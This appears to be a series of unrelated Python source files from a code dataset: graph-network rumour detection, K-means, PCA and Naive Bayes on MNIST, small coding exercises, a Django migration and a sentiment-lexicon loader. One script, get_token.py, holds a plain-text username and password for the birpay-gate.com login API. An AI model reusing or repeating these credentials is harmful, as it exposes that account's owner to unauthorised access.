torch.sum(adj_att.unsqueeze(-1) * x_local_tangent, dim=1)\n output = self.manifold.proj(self.manifold.expmap(x, support_t, c=self.c), c=self.c)\n return output\n else:\n adj_att = self.att(x_tangent, adj)\n support_t = torch.matmul(adj_att.to('cpu'), x_tangent.to('cpu'))\n else:\n support_t = torch.spmm(adj.to('cpu'), x_tangent.to('cpu')).to('cpu')\n output = self.manifold.proj(self.manifold.expmap0(support_t, c=self.c), c=self.c)\n return output\n\n def extra_repr(self):\n return 'c={}'.format(self.c)\n\n\nclass HypAct(Module):\n \"\"\"\n Hyperbolic activation layer.\n \"\"\"\n\n def __init__(self, manifold, c_in, c_out, act):\n super(HypAct, self).__init__()\n self.manifold = manifold\n self.c_in = c_in\n self.c_out = c_out\n self.act = nn.LeakyReLU()\n\n def forward(self, x):\n xt = self.act(self.manifold.logmap0(x, c=self.c_in))\n xt = torch.tensor(xt)\n xt = self.manifold.proj_tan0(xt, c=self.c_out)\n return self.manifold.proj(self.manifold.expmap0(xt, c=self.c_out), c=self.c_out)\n\n def extra_repr(self):\n return 'c_in={}, c_out={}'.format(\n self.c_in, self.c_out\n )\n \n# Encoders\nclass Encoder(nn.Module):\n \"\"\"\n Encoder abstract class.\n \"\"\"\n\n def __init__(self, c):\n super(Encoder, self).__init__()\n self.c = c\n\n def encode(self, x, adj):\n if self.encode_graph:\n input = (x, adj)\n output, _ = self.layers(input)\n else:\n output = self.layers(x)\n return output\n \nclass HGCN(Encoder):\n \"\"\"\n Hyperbolic-GCN.\n \"\"\"\n\n def __init__(self, c, dropout, bias, use_att, local_agg):\n super(HGCN, self).__init__(c)\n dims, acts, self.curvatures = get_dim_act_curv(c=c, act='relu', num_layers=2, feat_dim=128, dim=32 )\n self.manifold = Hyperboloid()\n self.curvatures.append(self.c)\n hgc_layers = []\n for i in range(len(dims) - 1):\n c_in, c_out = self.curvatures[i], self.curvatures[i + 1]\n in_dim, out_dim = dims[i], dims[i + 1]\n act = acts[i]\n hgc_layers.append(\n HyperbolicGraphConvolution(\n self.manifold, in_dim, out_dim, c_in, c_out, dropout, act, bias, use_att, local_agg\n )\n )\n self.layers = nn.Sequential(*hgc_layers)\n self.encode_graph = True\n\n def encode(self, x, adj):\n x_tan = self.manifold.proj_tan0(x, self.curvatures[0]) # manifold\n x_hyp = self.manifold.expmap0(x_tan, c=self.curvatures[0])\n x_hyp = self.manifold.proj(x_hyp, c=self.curvatures[0])\n return super().encode(x_hyp, adj)\n\ndef init_weights(m):\n if type(m) == nn.Linear:\n torch.nn.init.xavier_uniform(m.weight)\n m.bias.data.fill_(0.01)\n\n# Base Model\nclass BaseModel(nn.Module):\n \"\"\"\n Base model for graph embedding tasks.\n \"\"\"\n\n def __init__(self, device, c):\n super(BaseModel, self).__init__()\n \n # c is the hyperbolic curvature\n self.c = torch.tensor([c]).to(device)\n \n self.encoder = HGCN(c=self.c, dropout=0.5, bias=1, use_att=True, local_agg=False)\n \n \n self.output = nn.Sequential(\n nn.Linear(32, 1),\n nn.Sigmoid()\n )\n \n \n\n def forward(self, x, edge_m, batch):\n o = torch.zeros_like(x)\n\n # derive adj_matrix from edge_m\n edge_m_transposed = torch.transpose(edge_m, 0, 1)\n adj = torch.zeros_like(torch.empty(len(x), len(x)))\n for item in edge_m_transposed:\n adj[item[0]][item[1]] = 1\n \n h = self.encoder.encode(x, adj)\n # take care of the row of nans\n h[torch.isnan(h)] = 0\n # print(h)\n \n # h = F.normalize(h, dim=0)\n \n # mean pooling\n h = scatter_max(h, batch.batch.to('cpu'), dim=0)\n # print(h)\n # h = torch_geometric.nn.pool.avg_pool_x(torch.zeros(h.shape[0]).to('cuda'), h, torch.zeros(h.shape[0]).to('cuda'))\n \n # normalize output of mean pooling\n h = F.normalize(h[0], dim=0)\n # print(h)\n out = self.output(h)\n return out\n\n# Base Model 2\n\nclass GCNConv(MessagePassing):\n def __init__(self, in_channels, out_channels):\n super(GCNConv, self).__init__(aggr='add') # \"Add\" aggregation (Step 5).\n self.lin = torch.nn.Linear(in_channels, out_channels)\n\n def forward(self, x, edge_index):\n # x has shape [N, in_channels]\n # edge_index has shape [2, E]\n\n # Step 1: Add self-loops to the adjacency matrix.\n edge_index, _ = add_self_loops(edge_index, num_nodes=x.size(0))\n\n # Step 2: Linearly transform node feature matrix.\n x = self.lin(x)\n\n # Step 3: Compute normalization.\n row, col = edge_index\n deg = degree(col, x.size(0), dtype=x.dtype)\n deg_inv_sqrt = deg.pow(-0.5)\n deg_inv_sqrt[deg_inv_sqrt == float('inf')] = 0\n norm = deg_inv_sqrt[row] * deg_inv_sqrt[col]\n\n # Step 4-5: Start propagating messages.\n return self.propagate(edge_index, x=x, norm=norm)\n\n def message(self, x_j, norm):\n # x_j has shape [E, out_channels]\n\n # Step 4: Normalize node features.\n return norm.view(-1, 1) * x_j\n \nclass BaseModelH(nn.Module):\n def __init__(self, in_feats, hid_feats, out_feats):\n super(BaseModelH, self).__init__()\n self.gcn1 = GCNConv(in_feats, hid_feats)\n self.gcn2 = GCNConv(hid_feats, out_feats)\n \n def forward(self, data):\n x1 = self.gcn1(data['x'].float(), data['edge_index'].float())\n x2 = self.gcn2(x1, data['edge_index'].float())\n return x2\n \ndef update_function(param, grad, loss, learning_rate):\n return param - learning_rate * grad\n\n# main code\nupdated_df = pd.read_csv('./data/updated_pheme_rnr1.csv').drop(['Unnamed: 0'], axis=1)\nprint(updated_df)\n\n# updated_df = updated_df.astype({'parent': str})\n\ntreeDic = {}\n\nfor index, row in updated_df.iterrows():\n if math.isnan(row['parent']):\n root_id = row['graph_index']\n \n if not treeDic.__contains__(root_id):\n treeDic[root_id] = {}\n \n indexP = 'None'\n \n else:\n # hardcode...\n# if index == 30:\n# indexP = 12\n# elif index in range(126, 140):\n# indexP = 0\n# elif index in range(194, 208):\n# indexP = 0\n# elif index in range(303, 308) or index in range(309, 316):\n# indexP = 0\n# elif index == 318:\n# indexP = 1\n# elif index == 356:\n# indexP = 8\n# elif index in range(389,393) or index in range(395,408):\n# indexP = 0\n# else:\n indexP = updated_df.loc[updated_df['id'] == row['parent'], 'node_index'].values[0]\n \n indexC = row['node_index']\n vec = json.loads(row['word_embedding'])\n vec = np.array(vec)\n treeDic[root_id][indexC] = {'parent': indexP, 'vec': vec}\n \nlabelDic = {}\nfor index, row in updated_df.iterrows():\n if row['node_index'] == 0:\n root_id = row['graph_index']\n \n if row['label'] == 'rumours':\n label = 1\n else:\n label = 0\n \n if not labelDic.__contains__(root_id):\n labelDic[root_id] = label\n \nlist_of_features = []\nedge_indices = []\nlabels = []\n\nfor i in range(1, 6426):\n feat, graph, rootFeat, rootIndex, edge_m, index2node = construct_tree(treeDic[i])\n \n list_of_features.append(feat)\n edge_indices.append(edge_m)\n labels.append(labelDic[i])\n \ndataset = GraphDataset(list_of_features, edge_indices, labels)\n\nbatch_size = 1\ntest_split = .2\nshuffle_dataset = True\nrandom_seed= 42\n\n# Creating data indices for training and validation splits:\ndataset_size = len(dataset)\nindices = list(range(dataset_size))\nsplit = int(np.floor(test_split * dataset_size))\nif shuffle_dataset :\n np.random.seed(random_seed)\n np.random.shuffle(indices)\ntrain_indices, test_indices = indices[split:], indices[:split]\n\n# Creating PT data samplers and loaders:\ntrain_sampler = SubsetRandomSampler(train_indices)\ntest_sampler = SubsetRandomSampler(test_indices)\n\ntrain_loader = DataLoader(dataset, batch_size=batch_size,\n sampler=train_sampler)\ntest_loader = DataLoader(dataset, batch_size=batch_size,\n sampler=test_sampler)\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\nc = 1\nmodel = BaseModel(device, c).to(device)\noptimizer = torch.optim.SGD(model.parameters(), lr=0.01, momentum=0.9)\nloss_fn = nn.BCELoss()\nepochs = 5 \n\n# train model\nprint(\"=====Training model=====\")\nprint(list(model.parameters()))\nrunning_train_losses = []\nmodel.train()\nfor epoch in range(epochs):\n correct = 0\n for num, batch in enumerate(train_loader):\n \n model.zero_grad()\n optimizer.zero_grad()\n if num % 1000 == 0:\n print(\"+++++++++\")\n print(list(model.parameters()))\n output = model(batch['x'].to(device), batch['edge_index'].to(device), batch)\n loss = loss_fn(output, torch.reshape(batch['y'], (1,1)).float().to(device))\n loss.backward()\n optimizer.step()\n \n # with torch.no_grad():\n # for p in model.parameters():\n # new_val = update_function(p, p.grad, loss, 0.1)\n \n if num % 1000 == 0:\n print(list(model.parameters()))\n print(\"+++++++++\")\n \n # if output.item() >= threshold:\n # predicted = torch.LongTensor([[1]]).to('cuda')\n # else:\n # predicted = torch.LongTensor([[0]]).to('cuda')\n \n predicted = torch.round(output.data).long()\n \n if predicted == torch.reshape(batch['y'], (1,1)).to(device):\n correct += 1\n \n # if num % 250 == 0:\n # print(output)\n # print(batch['y'])\n \n if num % 1000 == 0:\n print(num)\n print(\"Loss: \", loss.item())\n \n running_train_losses.append(loss.item())\n \n print(\"Epoch %i complete! Average loss was %.4f\" % (epoch + 1, sum(running_train_losses) / len(running_train_losses)))\n print(\"Train accuracy: \" , 100.0 * (correct / 5140))\n \n# evaluate model\nprint(\"====EVALUATING MODEL====\")\ncorrect = 0\ny_true = []\ny_pred = []\nwith torch.no_grad():\n for num, batch in enumerate(test_loader):\n \n output = model(batch['x'].to(device), batch['edge_index'].to(device), batch)\n predicted = torch.round(output.data).long()\n \n # if output.item() >= threshold:\n # predicted = torch.LongTensor([[1]]).to('cuda')\n # else:\n # predicted = torch.LongTensor([[0]]).to('cuda')\n \n if predicted == torch.reshape(batch['y'], (1,1)).to(device):\n correct += 1\n \n y_true.append(torch.reshape(batch['y'], (1,1)).to(device).item())\n y_pred.append(predicted.item())\n \ntest_acc = 100.0 * (correct / 1285)\nf1 = f1_score(y_true, y_pred, average='binary')\nprint(\"Test accuracy: \", test_acc)\nprint(\"F1 Score: \", 100.0 * f1)\n ","repo_name":"huyxmai/GraphClassification","sub_path":"testingscriptBERT.py","file_name":"testingscriptBERT.py","file_ext":"py","file_size_in_byte":28046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23211795776","text":"from pickle import TRUE\r\nfrom keras.datasets import mnist\r\nfrom matplotlib import pyplot\r\nimport math\r\nfrom sklearn.naive_bayes import GaussianNB\r\nimport numpy as np\r\n\r\ndef Maximin(array, size, center_num, V):\r\n distance = [0.0] * size\r\n hcis = [0] * size\r\n centers = np.zeros((center_num, V))\r\n centers[0] = array[0]\r\n \r\n i = 0\r\n while i < size:\r\n sum = 0\r\n j = 0\r\n while j < V:\r\n sum = sum + (array[i][j] - centers[0][j]) ** 2\r\n j = j + 1\r\n distance[i] = math.sqrt(sum)\r\n hcis[i] = 0\r\n i = i + 1\r\n \r\n i = 1\r\n while i < center_num:\r\n index_max = 0\r\n dmax = 0.0\r\n j = 0\r\n while j < size:\r\n if distance[j] <= dmax:\r\n j = j + 1\r\n continue\r\n while hcis[j] < i - 1:\r\n hcis[j] = hcis[j] + 1\r\n another_sum = 0\r\n z = 0\r\n while z < V:\r\n another_sum = another_sum + ((array[j][z] - centers[hcis[j]][z]) ** 2)\r\n z = z + 1\r\n d = math.sqrt(another_sum)\r\n if d < distance[j]:\r\n distance[j] = d\r\n if d < dmax:\r\n break\r\n\r\n if distance[j] > dmax:\r\n dmax = distance[j]\r\n index_max = j\r\n j = j + 1\r\n distance[index_max] = 0.0\r\n centers[i] = array[index_max]\r\n i = i + 1\r\n return centers\r\n\r\n\r\n# this function calculate the new centers for the Kmeans algorithm \r\ndef NewCenters(V, data):\r\n centers = np.zeros((1, V))\r\n i = 0\r\n while i < V:\r\n sum = 0\r\n j = 0\r\n while j < len(data):\r\n sum = sum + data[j][i]\r\n j = j + 1\r\n centers[0][i] = sum\r\n i = i + 1\r\n\r\n new = np.zeros((1, V))\r\n i = 0\r\n while i < V:\r\n new[0][i] = centers[0][i] / len(data)\r\n i = i + 1\r\n return new[0]\r\n\r\n\r\ndef Kmeans(centers, array, y_train, V, plot):\r\n\r\n data1 = []\r\n train1 = []\r\n data2 = []\r\n train2 = []\r\n data3 = []\r\n train3 = []\r\n data4 = []\r\n train4 = []\r\n d = [0.0] * len(centers)\r\n\r\n while True:\r\n x1 = 0\r\n x2 = 0\r\n x3 = 0\r\n x4 = 0\r\n \r\n i = 0\r\n while i < len(array):\r\n j = 0\r\n while j < len(centers):\r\n sum = 0\r\n z = 0\r\n # euclidean distance\r\n while z < V:\r\n sum = sum + ((array[i][z] - centers[j][z]) ** 2)\r\n z = z + 1\r\n d[j] = math.sqrt(sum)\r\n j = j + 1\r\n #minimun distance\r\n min_d = min(d[0], d[1], d[2], d[3])\r\n if min_d == d[0]:\r\n data1.append([V])\r\n data1[x1] = array[i]\r\n x1 = x1+ 1\r\n train1.append(y_train[i])\r\n elif min_d == d[1]:\r\n data2.append([V])\r\n data2[x2] = array[i]\r\n x2 = x2 + 1\r\n train2.append(y_train[i])\r\n elif min_d == d[2]:\r\n data3.append([V])\r\n data3[x3] = array[i]\r\n x3 = x3 + 1\r\n train3.append(y_train[i])\r\n elif min_d == d[3]:\r\n data4.append([V])\r\n data4[x4] = array[i]\r\n x4 = x4 + 1\r\n train4.append(y_train[i])\r\n i = i + 1\r\n\r\n new = np.zeros((4, V))\r\n # find new centers \r\n new[0] = NewCenters(V, data1)\r\n new[1] = NewCenters(V, data2)\r\n new[2] = NewCenters(V, data3)\r\n new[3] = NewCenters(V, data4)\r\n\r\n # if centers did not change is the answer else run the algorithm again\r\n if np.array_equal(centers, new):\r\n break\r\n else:\r\n centers = new\r\n data1.clear()\r\n train1.clear()\r\n data2.clear()\r\n train2.clear()\r\n data3.clear()\r\n train3.clear()\r\n data4.clear()\r\n train4.clear()\r\n d = [0.0] * len(centers)\r\n # find which of the digit appears most \r\n # count the times tha appears\r\n sum1 = train1.count(max(train1, key=train1.count))\r\n sum2 = train2.count(max(train2, key=train2.count))\r\n sum3 = train3.count(max(train3, key=train3.count))\r\n sum4 = train4.count(max(train4, key=train4.count))\r\n\r\n purity = (sum1 + sum2 + sum3 + sum4) / (len(array))\r\n\r\n # [:,0] Rreturn the column 0 of the array(2D)\r\n # plot a variable to fill the data if we need to plot a graph\r\n if plot == True:\r\n data1x = np.array(data1)[:,0]\r\n data1y = np.array(data1)[:,1]\r\n data2x = np.array(data2)[:,0]\r\n data2y = np.array(data2)[:,1]\r\n data3x = np.array(data3)[:,0]\r\n data3y = np.array(data3)[:,1]\r\n data4x = np.array(data4)[:,0]\r\n data4y = np.array(data4)[:,1]\r\n pyplot.scatter(data1x, data1y, color='red')\r\n pyplot.scatter(data2x, data2y, color='green')\r\n pyplot.scatter(data3x, data3y, color='blue')\r\n pyplot.scatter(data4x, data4y, color='yellow')\r\n pyplot.scatter(centers[:, 0], centers[:, 1], c='black', s=200, alpha=1)\r\n pyplot.show()\r\n \r\n return purity\r\n\r\n# Implement the Principal Component Analysis (PCA) algorithm.\r\ndef PCA(M, V):\r\n M2 = M - np.mean(M, axis=0)\r\n covariance = np.cov(M2, rowvar=False)\r\n values, vectors = np.linalg.eigh(covariance)\r\n sorted = np.argsort(values)[::-1]\r\n sortedVectors = vectors[:, sorted]\r\n vectorSubset = sortedVectors[:, 0:V]\r\n reduced = np.dot(vectorSubset.transpose(), M2.transpose()).transpose()\r\n\r\n return reduced\r\n\r\ndef main():\r\n \r\n #load data from mnist where x image (as array), where y the answer\r\n (train_X, train_y), (test_X, test_y) = mnist.load_data()\r\n \r\n temp = []\r\n# temp_y= []\r\n i = 0\r\n # load only a subset of it, consisting of the classes (digits) i = 1, 3, 7, 9\r\n while i < len(train_y):\r\n if (train_y[i] == 1) | (train_y[i] == 3) | (train_y[i] == 7) | (train_y[i] == 9):\r\n #get the positions of 1,3,7,9\r\n temp.append(i); \r\n # temp_x.append(train_X[i])\r\n # temp_y.append(train_y[i])\r\n i = i + 1\r\n \r\n #x y _train has only the 1 3 5 7 9\r\n x_train = train_X[temp]\r\n y_train = train_y[temp]\r\n temp = []\r\n i = 0\r\n #same for test\r\n while i < len(test_y):\r\n if (test_y[i] == 1) | (test_y[i] == 3) | (test_y[i] == 7) | (test_y[i] == 9):\r\n temp.append(i)\r\n # temp_x_test.append(test_X[i])\r\n # temp_y_test.append(test_y[i])\r\n i = i + 1\r\n \r\n X_test = test_X[temp]\r\n Y_test = test_y[temp]\r\n\r\n # x_train = temp_x\r\n # y_train = temp_y\r\n # X_test = temp_x_test\r\n # Y_test = temp_y_test\r\n\r\n \r\n #After calculating the two-dimensional features for each sample in M, use them to create a matrix M' \r\n M = np.zeros((len(x_train), 2))\r\n \r\n i = 0 \r\n # the first feature component is the mean pixel value of all image matrix \r\n # rows with odd index, while the second feature component is calculated as the mean pixel\r\n # value of all image matrix columns whose index is an even number \r\n while i < (len(x_train)):\r\n \r\n odd = 0\r\n even = 0\r\n j = 0\r\n while j < 28:\r\n #check if it is odd or even\r\n if j % 2 != 0:\r\n z = 0\r\n while z < 28:\r\n odd = odd + x_train[i][j][z]\r\n z = z +1\r\n j = j + 1\r\n\r\n j = 0\r\n while j < 28:\r\n if j % 2 == 0:\r\n z = 0\r\n while z < 28:\r\n even = even + x_train[i][z][j]\r\n z = z + 1\r\n j = j + 1\r\n odd = odd / 392.0\r\n even = even / 392.0\r\n M[i][0] = odd\r\n M[i][1] = even\r\n i = i + 1\r\n\r\n \r\n #Use a scatter plot to visualize all rows of M' ... assign different colors for different class samples\r\n x1 = []\r\n y1 = []\r\n x3 = []\r\n y3 = []\r\n x7 = []\r\n y7 = []\r\n x9 = []\r\n y9 = []\r\n \r\n i = 0 \r\n # seperation of each class\r\n while i < (len(x_train)):\r\n if y_train[i] == 1:\r\n x1.append(M[i][0])\r\n y1.append(M[i][1])\r\n\r\n if y_train[i] == 3:\r\n x3.append(M[i][0])\r\n y3.append(M[i][1])\r\n\r\n if y_train[i] == 7:\r\n x7.append(M[i][0])\r\n y7.append(M[i][1])\r\n\r\n if y_train[i] == 9:\r\n x9.append(M[i][0])\r\n y9.append(M[i][1])\r\n i = i + 1 \r\n \r\n pyplot.scatter(x1, y1, color='red')\r\n pyplot.scatter(x3, y3, color='green')\r\n pyplot.scatter(x7, y7, color='blue')\r\n pyplot.scatter(x9, y9, color='yellow')\r\n pyplot.show()\r\n \r\n # use your implementation of the Maximin algorithm to initialize the cluster centers in the K-Means algorithm\r\n # 4 for centers and 2 for dimension\r\n centers = Maximin(M, len(x_train), 4, 2)\r\n purity = Kmeans(centers, M, y_train, 2, True)\r\n print('purity : ', purity)\r\n\r\n # 28*28 to 784\r\n M2 = np.zeros((len(x_train), 784), dtype=int)\r\n i = 0\r\n while i < len(x_train):\r\n j = 0\r\n while j < 784:\r\n z = 0\r\n while z < 28:\r\n k = 0\r\n while k < 28:\r\n M2[i][j] = x_train[i][z][k]\r\n j = j + 1\r\n k = k + 1\r\n z = z + 1\r\n i = i + 1 \r\n\r\n # Aplly the algorithm to reduce the dimension of rows of M, in order to get a new matrix M˜ ,\r\n # where V = 2 25 50 100 the new number dimensions\r\n\r\n V = PCA(M2, 2)\r\n c2 = Maximin(V, len(V), 4, 2)\r\n purity = Kmeans(c2, V, y_train, 2, True)\r\n print('purity for V=2 is : ', purity)\r\n\r\n V25 = PCA(M2, 25)\r\n c3 = Maximin(V25, len(V25), 4, 25)\r\n purity = Kmeans(c3, V25, y_train, 25, False)\r\n print('purity for V=25 is : ', purity)\r\n\r\n V = PCA(M2, 50)\r\n c4 = Maximin(V, len(V), 4, 50)\r\n purity = Kmeans(c4, V, y_train, 50, False)\r\n print('purity for V=50 is : ', purity)\r\n\r\n V = PCA(M2, 100)\r\n c5 = Maximin(V, len(V), 4, 100)\r\n purity = Kmeans(c5, V, y_train, 100, False)\r\n print('purity for V=100 is : ', purity)\r\n \r\n # Implement a Gaussian Naive Bayes Classifier. Use the rows of M˜ for V = Vmax and the\r\n # ground truth labels of Ltr to train the classifier. Then, use the same dimensionality reduction\r\n # process on the test data samples (rows of N), in order to obtain N˜ . Use the trained classifier\r\n # on the new test samples (rows of N�� ). Use the classification results and Lte to calculate the\r\n # classification accuracy.\r\n \r\n classifier = GaussianNB()\r\n \r\n #Use the rows of M˜ for V = Vmax = 25\r\n #fit for training\r\n classifier.fit(V25, y_train)\r\n N = np.zeros((len(X_test), 784), dtype=int)\r\n i = 0\r\n while i < len(X_test):\r\n j = 0\r\n while j < 784:\r\n z = 0\r\n while z < 28:\r\n k = 0\r\n while k < 28:\r\n N[i][j] = X_test[i][z][k]\r\n j = j + 1\r\n k = k + 1\r\n z = z + 1\r\n j = j + 1 \r\n i = i + 1\r\n V_25_test = PCA(N, 25)\r\n \r\n # score = the mean accuracy on the given test data and labels\r\n score = classifier.score(V_25_test, Y_test)\r\n print(\"Naive Bayes score: \", score)\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"pkyriakou23/implement-K-means","sub_path":"clustering_ex.py","file_name":"clustering_ex.py","file_ext":"py","file_size_in_byte":11698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42088295022","text":"# 남은 일 수\nn = int(input())\n# [상담을 완료하는데 걸리는 기간, 받을 수 있는 금액]\nschedule = [list(map(int, input().split())) for _ in range(n)]\n\ncost = [0 for _ in range(n+1)] # 결과(최대 이익)\n# 마지막날부터 거꾸로 체크하면서 최대이익 찾기\nfor i in range(n-1, -1, -1):\n # i일에 상담을 하는 것이 퇴사일을 넘기면 상담을 하지 않는다.\n if schedule[i][0] + i > n:\n cost[i] = cost[i+1]\n else:\n # i일에 상담을 하는 것과 상담을 안하는 것 중 큰 것을 선택\n cost[i] = max(schedule[i][1] + cost[i + schedule[i][0]], cost[i+1])\n\nprint(max(cost))","repo_name":"subinmun1997/my_python-for-coding-test","sub_path":"BAEKJOON/삼성 SW 역량 테스트/solution20.py","file_name":"solution20.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"29696987560","text":"\"\"\"\nFaça um Programa para uma loja de tintas. O programa deverá pedir o tamanho em metros quadrados da área a ser pintada.\nConsidere que a cobertura da tinta é de 1 litro para cada 6 metros quadrados e que a tinta é vendida em latas de 18\nlitros, que custam R$ 80,00 ou em galões de 3,6 litros, que custam R$ 25,00.\nInforme ao usuário as quantidades de tinta a serem compradas e os respectivos preços em 3 situações:\n Comprar apenas latas de 18 litros;\n Comprar apenas galões de 3,6 litros;\n Misturar latas e galões, de forma que o desperdício de tinta seja menor. Acrescente 10% de folga e sempre arredonde\n os valores para cima, isto é, considere latas cheias.\n\"\"\"\n# from math import ceil, floor\n\n\ndef calcular_metros_quadrados(x, y):\n if x == 0 or y == 0:\n raise ValueError(\"Não pode ser 0\")\n return x * y\n\n\nif __name__ == '__main__':\n largura = 40 # float(input(\"Largura: \"))\n altura = 5.6 # float(input(\"Altura: \"))\n real_m2 = calcular_metros_quadrados(largura, altura)\n increase_10 = 10/100\n coverage = 6 # six square meters per liter\n nominal_m2 = real_m2 * (1 + increase_10) / coverage\n cans = 18\n gallons = 3.6\n a, b = divmod(nominal_m2, cans)\n b, c = (divmod(b, gallons))\n print(f'latas: {a}')\n print(f'galões: {b}')\n\n print(f'{3.6 - c} liters to complete 1 more gallon')\n","repo_name":"marcosranes/PythonEssentials","sub_path":"exercises_list/exercicio_17.py","file_name":"exercicio_17.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9242009606","text":"if __name__ == '__main__':\r\n money = int(input(\"금액을 입력하세요 : \"))\r\n print(\"환전할 금액 %d원\"%money)\r\n\r\n re1= int(money/10000)\r\n don=money%10000\r\n re2= int(don/5000)\r\n don=money%5000\r\n re3 = int(don/1000)\r\n don=money%1000\r\n re4 = int(don/ 500)\r\n\r\n print(\"10,000원권 %d장\"%re1)\r\n print(\"5,000원권 %d장\"%re2)\r\n print(\"1000원권 %d장\"%re3)\r\n print(\"500원권 %d장\" % re4)\r\n\r\n","repo_name":"JngHoon2/Academy_Python_output","sub_path":"chap01_02_list/chap01_02_grammar1/04_operator_project.py","file_name":"04_operator_project.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30500022596","text":"import requests\n\n\ndef get_new_token():\n cookies = None\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0',\n 'Accept': 'application/json, text/plain, */*',\n 'Accept-Language': 'ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3',\n 'Content-Type': 'application/json;charset=utf-8',\n 'Origin': 'https://birpay-gate.com',\n 'Connection': 'keep-alive',\n 'Referer': 'https://birpay-gate.com/login',\n 'Sec-Fetch-Dest': 'empty',\n 'Sec-Fetch-Mode': 'cors',\n 'Sec-Fetch-Site': 'same-origin',\n }\n\n json_data = {\n 'username': 'Operator6_Zajon_AZN',\n 'password': 'hRQLVYCJ',\n }\n\n response = requests.post('https://birpay-gate.com/api/login_check', cookies=cookies, headers=headers, json=json_data)\n if response.status_code == 200:\n token = response.json().get('token')\n with open('token.txt', 'w') as file:\n file.write(token)\n return token\n\n\n# x = get_new_token()\n# print(x)","repo_name":"Maniackaa/Project-deposite","sub_path":"birpay/get_token.py","file_name":"get_token.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7050832450","text":"#Ingreso de Datos\r\nn = int(input(\"Ingrese numero: \"))\r\nnombre = input(\"Ingresa un nombre: \")\r\n\r\n# While\r\ni = 0 # iniciando contador,\r\n # OPCIONAL\r\n # Explicar por que suele usarse el 0 como valor de inicio\r\n # Python como C/C++ entre otros son lenguajes con colecciones basadas en\r\n # Zero-based index\r\n\r\nwhile i < n: # evaluando condicion\r\n print(nombre)\r\n i += 1 # incrementando contador\r\n\r\n","repo_name":"katiavega/CS1100_S04","sub_path":"Ejercicio01.py","file_name":"Ejercicio01.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36296708977","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('mueble', '0005_auto_20160615_1516'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='EspecificacionMueble',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('especificacion', models.CharField(max_length=100)),\n ('ancho', models.DecimalField(decimal_places=2, max_digits=7)),\n ('largo', models.DecimalField(decimal_places=2, max_digits=7)),\n ('alto', models.DecimalField(decimal_places=2, max_digits=7)),\n ('punto', models.IntegerField()),\n ('mueble', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='mueble.Mueble')),\n ],\n options={\n 'verbose_name': 'Especificación del mueble',\n 'verbose_name_plural': 'Especificaciones del mueble',\n },\n ),\n migrations.RemoveField(\n model_name='especificaionmueble',\n name='mueble',\n ),\n migrations.DeleteModel(\n name='EspecificaionMueble',\n ),\n ]\n","repo_name":"yusnelvy/mudarte_express_backend","sub_path":"mueble/migrations/0006_auto_20160615_1544.py","file_name":"0006_auto_20160615_1544.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18003484873","text":"import io\nimport csv\nimport json\n\nfrom gensim.models import KeyedVectors\n\nfrom config import Config\n\ntaglist = []\nstop_words = []\n_word_vectors = None\nsepl = {}\npolarity_clues = {}\nsubjectivity_clues = {}\npunctuations = ['.', ',', '\"', '!', '?', '-', '_']\numlauts = {\n 'ä': 'ae',\n 'ö': 'oe',\n 'ü': 'ue',\n 'Ä': 'Ae',\n 'Ö': 'Oe',\n 'Ü': 'Ue',\n 'ß': 'ss'\n}\n\n# needed because _word_vectors reference changes when init is called\ndef get_word_vectors():\n return _word_vectors\n\n\ndef init_all_ressources():\n config = Config()\n init_taglist(config.paths['taglist'])\n init_stop_words(config.paths['stopwords'])\n init_sepl(config.paths['sepl'])\n init_polarity_clues(config.paths['polarity_clues'])\n init_subjectivity_clues(config.paths['subjectivity_clues'])\n init_word_vectors(config.paths['word_vector_model'])\n\n\ndef init_taglist(taglist_path):\n global taglist\n print('initializing taglist...')\n with io.open(taglist_path, encoding='utf-8') as file:\n reader = csv.reader(file, delimiter=';')\n for line in reader:\n taglist.append(line[0])\n\n print('initializing taglist - FINISHED')\n\n\ndef init_stop_words(stop_words_path):\n global stop_words\n\n print('initializing stop words...')\n with io.open(stop_words_path, encoding='utf-8') as file:\n stop_words = json.load(file)\n print('initializing stop words - FINISHED')\n\n\ndef init_word_vectors(word_vector_path):\n global _word_vectors\n print('initializing word vectors...')\n _word_vectors = KeyedVectors.load_word2vec_format(word_vector_path, binary=True)\n print('initializing word vectors - FINISHED')\n\n\ndef init_sepl(sepl_path):\n global sepl\n print('initializing sepl...')\n with io.open(sepl_path, encoding='utf-8') as file:\n reader = csv.reader(file, delimiter=';')\n for line in reader:\n if line[0][0] != '#':\n sepl[line[0]] = float(line[1])\n print('initializing sepl - FINISHED')\n\n\ndef init_polarity_clues(polarity_path):\n global polarity_clues\n print('initializing polarity clues...')\n with io.open(polarity_path, encoding='utf-8') as file:\n reader = csv.reader(file, delimiter='\\t')\n for line in reader:\n value = 0\n if line[3] == 'negative':\n value = -1\n if line[3] == 'positive':\n value = 1\n polarity_clues[line[1]] = value\n 